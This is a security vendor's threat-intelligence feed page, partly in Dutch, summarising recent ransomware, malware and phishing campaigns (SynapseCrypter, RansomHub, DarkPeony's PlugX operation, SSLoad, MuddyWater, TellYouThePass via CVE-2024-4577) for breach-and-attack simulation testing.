New Immediate Threats!

Het Cymulate Research Lab detecteert en analyseert wekelijks nieuwe cyberdreigingen, en maakt hiervoor BAS-aanvalscenario’s onmiddellijk beschikbaar.

Hierdoor kun je proactief en automatisch de eigen cyberweerbaarheid offensief testen en weet je direct of de beveiligingsmaatregelen nog steeds adequaat zijn.


Immediate Threats

    • Technical Analysis Of The SynapseCrypter Ransomware-As-A-Service

      A recently identified ransomware SynapseCrypter which emerged in early 2024 is distributed via Ransomware-as-a-Service (RaaS) on the the Russian dark web forum RAMP. The SynapseCrypter.exe payload is capable of rapid encryption using multiple encryption modes performs NTFS searches and privilege escalation via access token manipulation. It avoids encrypting systems in Iran suggesting possible affiliations with Iran-sympathizer groups. Synapse uses a custom encryption algorithm like Babuk Ransomware and appears to have borrowed features from the Lambda ransomware family hinting at reused code and connections with other ransomware as a service groups or developers. The ransomware checks system time zones and languages to ensure Iranian systems are excluded employs NTFS search and deletes shadow copies before encryption. Encrypted telemetry is sent to designated C2 IPs the malware is also capable of performing network scanning and replication.

      See the solution
    • RansomHub Ransomware Exploits Zerologon Vulnerability To Encrypt Files

      RansomHub a new and rapidly growing Ransomware-as-a-Service (RaaS) is likely an updated version of the older Knight ransomware. Analysis revealed significant similarities between the two suggesting RansomHub originated from Knight. Despite this it is unlikely that Knights original creators are behind RansomHub. Knights source code originally known as Cyclops was sold on underground forums in February 2024 after its developers shut down their operation potentially allowing others to update and launch it as RansomHub. Both RansomHub and Knight are written in Go and most variants are obfuscated with Gobfuscate except for some early Knight versions. The code overlap is substantial making differentiation difficult without checking the embedded link to the data leak site. Both have nearly identical command-line help menus with RansomHub adding only a sleep command.

      See the solution
    • DarkPeony Carries Out Operation Control Plug

      The DarkPeony threat actor executed Operation ControlPlug against military and government agencies in Myanmar the Philippines Mongolia and Serbia. The campaign began with MSC files which when opened displayed a screen prompting users to click a link that executed a PowerShell script. This script remotely downloaded and executed an MSI file containing an EXE DLL and DAT file. The EXE file though legitimate facilitated DLL side-loading which loaded the DLL file to decode and execute the DAT file ultimately running PlugX. MSC files used with Microsoft Management Console exploited their Console Taskpad feature to execute arbitrary commands deceiving users into triggering the PowerShell script. Websites distributing the MSI files used Cloudflare to control access obstructing researchers while targeting specific organizations.

      See the solution
    • Dissecting SSLoad Malware A Comprehensive Technical Analysis

      This in-depth analysis explores the intricate inner workings of SSLoad a stealthy and adaptable malware known for its sophisticated delivery methods and evasion techniques. The comprehensive investigation unravels the malwares multistage infection chain dissecting the various loaders decryption algorithms and payloads employed across different campaigns. The analysis highlights SSLoads ability to gather reconnaissance evade detection and deploy additional malicious components underscoring its versatility and ever-evolving nature.

      See the solution
    • Cert IL Alert - Phishing campaign by Muddy Water

      Recently the National Cyber Directorate detected an active phishing campaign in the Israeli domain. The campaign is operating extensively across all sectors. The National Cyber Directorate attributes this campaign to the Iranian attack group MuddyWater based on familiarity with the groups infrastructure and TTPs (Tactics Techniques and Procedures).

      See the solution
    • PHP Vulnerability CVE-2024-4577 Weaponized To Distribute TellYouThePass Ransomware

      "Researchers have identified threat actors exploiting a PHP vulnerability (CVE-2024-4577) to spread TellYouThePass ransomware variants. The attackers utilize this exploit to run arbitrary PHP code leveraging the ""system"" function to execute an HTML application file hosted on their server via the mshta.exe binary which can execute remote payloads on Windows systems. This approach reflects a ""living off the land"" technique. TellYouThePass ransomware active since 2019 has evolved and now often appears as .NET samples delivered through HTML applications. The initial infection uses an HTA file containing malicious VBScript with a base64 encoded binary loaded into memory during runtime. Upon execution the malware sends an HTTP request to its command-and-control (C2) server disguised as a CSS resource request to avoid detection. The malware then enumerates directories kills processes generates encryption keys and encrypts files with specific extensions. Finally it places a ReadMe message in the web root directory to inform victims."

      See the solution